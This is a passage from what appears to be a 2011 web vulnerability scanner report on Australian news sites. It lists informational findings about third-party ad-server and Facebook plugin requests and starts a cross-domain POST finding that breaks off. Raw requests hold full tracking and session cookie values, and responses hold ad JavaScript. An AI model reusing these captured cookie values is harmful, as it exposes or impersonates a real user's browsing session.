Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=pR#?yN0FYbx1Nl=; ih="b!!!!2!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^!4cvD!!!!#=3r-A"; vuday1=!!w[/N0FYbp!k#l; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; BX=ei08qcd75vc4d&b=3&s=8s&t=246; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00A>TxV3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:21 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0229.rm.sp2
Set-Cookie: ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!$=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^!4cvD!!!!#=3r-A"; path=/; expires=Fri, 06-Sep-2013 14:14:21 GMT
Set-Cookie: vuday1=%)0sI!!w[/N0FYbn[@`@; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:14:21 GMT
Pragma: no-cache
Content-Length: 692
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?3,eAGljNtOg0AQht.GK2QPA1IkxKyABgOtIE1tbwwsG0E5rNut1rdvkxJ8AOdm.nz.zEfAA0oIJwQqFyguueMRoJYFtSVsamDP8wCIe0MdagTbBWZx1jxl4Vcb.7DLrKI5Mhax5.eJn1fGokC-vCYT6iQ..JX.Sjnk0SSIGZv83xF28zC-n82PD13a511aZDjZZPZyE-u0OLMAW8twTZKCW7ui.kyL7XHXr-lqfmS-YTRay1uEdCnpNa8HUx2qlo-DVOOH4NrkY49kqfQgFNpz1Uq9R9MJEn3b.ZqN7rs7pas3cdQ-uZLcdxxqI0IBFie7rG4a,\"><img border=\"0\" alt=\"\" height=\"1\" width=\"1\" src=\"http://pixel.rubiconproject.com/tap.php?v=6895|0\"></img></a>');
var rm_data = new Object();
rm_data.creative_id = 9210090;
rm_data.offer_type = 3;
rm_data.entity_id = 98910;
if (window.rm_crex_data) {rm_crex_data.push(9210090);}

Request 2

GET /imp?Z=1x1&s=2433412&B=10&u=&r=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=pR#?yN0FYbx1Nl=; ih="b!!!!2!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^!4cvD!!!!#=3r-A"; vuday1=!!w[/N0FYbp!k#l; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; BX=ei08qcd75vc4d&b=3&s=8s&t=246; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00A>TxV3

Response 2

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:42 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0229.rm.sp2
Set-Cookie: ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!2=3rvS!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^!4cvD!!!!#=3r-A"; path=/; expires=Fri, 06-Sep-2013 14:14:42 GMT
Set-Cookie: vuday1=!!!!$%)0sQJOU8[N0FYbX23<_; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246e13fd8ec57e6b759d1ec4812; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:14:42 GMT
Pragma: no-cache
Content-Length: 592
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?3,eAGljEsOgjAYhC.UBX2IkMbFLyApoWArBmVHIAqICUaNHl80TS.grOaR-TDl7ame5XkEM69xGodjShijbU1ZixzOOaXYd8mSIPhKqC5R4a0Xr18EyCNrASLYnk0PEMw5mHaH1FTj1Dzt-J.RVEeGIAAM.-4KX4dibdFx0stBDzKuhrRUi6wUD1lsRhngLisVTouGVUV7kcXxXV33JLdHWCH0AX39TjQ=,\"><img border=\"0\" alt=\"\" height=\"1\" width=\"1\" src=\"http://pixel.rubiconproject.com/tap.php?v=6895|0\"></img></a>');
var rm_data = new Object();
rm_data.creative_id = 9210090;
rm_data.offer_type = 3;
rm_data.entity_id = 98910;
if (window.rm_crex_data) {rm_crex_data.push(9210090);}

12.2. http://adnxs.revsci.net/imp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://adnxs.revsci.net
Path:	/imp

Request 1

GET /imp?Z=728x90&s=814544&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:15:08 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:08 GMT
Content-Length: 702

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html%3Fcb=0.5778487676288933%26keyword=wa/news_home&inv_code=814544&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D814544%26r%3D0%26_salt%3D1883775268%26u%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252F7856%252F12590%252F22893-2.html%253Fcb%253D0.5778487676288933%2526keyword%253Dwa%252Fnews_home%26u%3Dhttp%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home"></scr'+'ipt>');

Request 2

GET /imp?Z=728x90&s=814544&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:15:30 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:30 GMT
Content-Length: 443

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&inv_code=814544&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D814544%26r%3D0%26_salt%3D1883775268%26u%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252F7856%252F12590%252F22893-2.html%253Fcb%253D0.5778487676288933%2526keyword%253Dwa%252Fnews_home"></scr'+'ipt>');

12.3. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/connect/connect.php

Request 1

GET /connect/connect.php?id=290190314438&stream=0&connections=10&css= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

Request 2

GET /connect/connect.php?id=290190314438&stream=0&connections=10&css= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

12.4. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?action=recommend&api_key=130375173667364&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3abbddacc%26origin%3Dhttp%253A%252F%252Fau.news.yahoo.com%252Ff315867968%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F&layout=button_count&locale=en_AU&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

Request 2

GET /plugins/like.php?action=recommend&api_key=130375173667364&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3abbddacc%26origin%3Dhttp%253A%252F%252Fau.news.yahoo.com%252Ff315867968%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F&layout=button_count&locale=en_AU&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

12.5. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=135447496484311&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df118a03298%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=290&href=http%3A%2F%2Fwww.perthnow.com.au%2F&id=92409946191&locale=en_US&sdk=joey&show_faces=true&stream=false&width=316 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

Request 2

GET /plugins/likebox.php?api_key=135447496484311&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df118a03298%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=290&href=http%3A%2F%2Fwww.perthnow.com.au%2F&id=92409946191&locale=en_US&sdk=joey&show_faces=true&stream=false&width=316 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

12.6. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Request 1

GET /plugins/recommendations.php?height=300&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.themercury.com.au%2F&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

Request 2

GET /plugins/recommendations.php?height=300&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.themercury.com.au%2F&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

13. Cross-domain POST previous next
There are 2 instances of this issue:

http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
http://www.smh.com.au/business

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

13.1. http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.perthnow.com.au
Path:	/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

Issue detail

The page contains a form which POSTs data to the domain currencies.news.com.au. The form contains the following fields:
